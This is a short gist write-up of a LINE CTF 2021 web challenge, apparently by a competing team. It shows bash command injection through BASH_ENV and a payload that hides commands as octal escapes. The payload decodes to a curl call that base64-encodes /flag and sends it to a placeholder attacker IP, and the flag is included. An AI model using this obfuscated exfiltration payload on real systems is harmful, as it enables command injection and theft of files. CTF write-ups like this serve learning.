Skip to content

Instantly share code, notes, and snippets.

@mdsnins
Last active Mar 27, 2022
Embed
What would you like to do?
[LINE CTF 2021] bb

bb

LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

BASH_ENV envrionment

We can inject some bash command line using environment BASH_ENV.

BASH_ENV=touch /tmp /bin/bash will execute touch.

Non-alphabet command

It's like 34C3 ctf's challenge. We can call cat like $'\143\141\164'

Thus, final payload is

`$%27\143\165\162\154%27%20111.111.111.111:40010/$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20$%27\142\141\163\145\66\64%27)`

replace 111.111.111.111 to attacker ip.

LINECTF{well..what_do_you_think_about}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment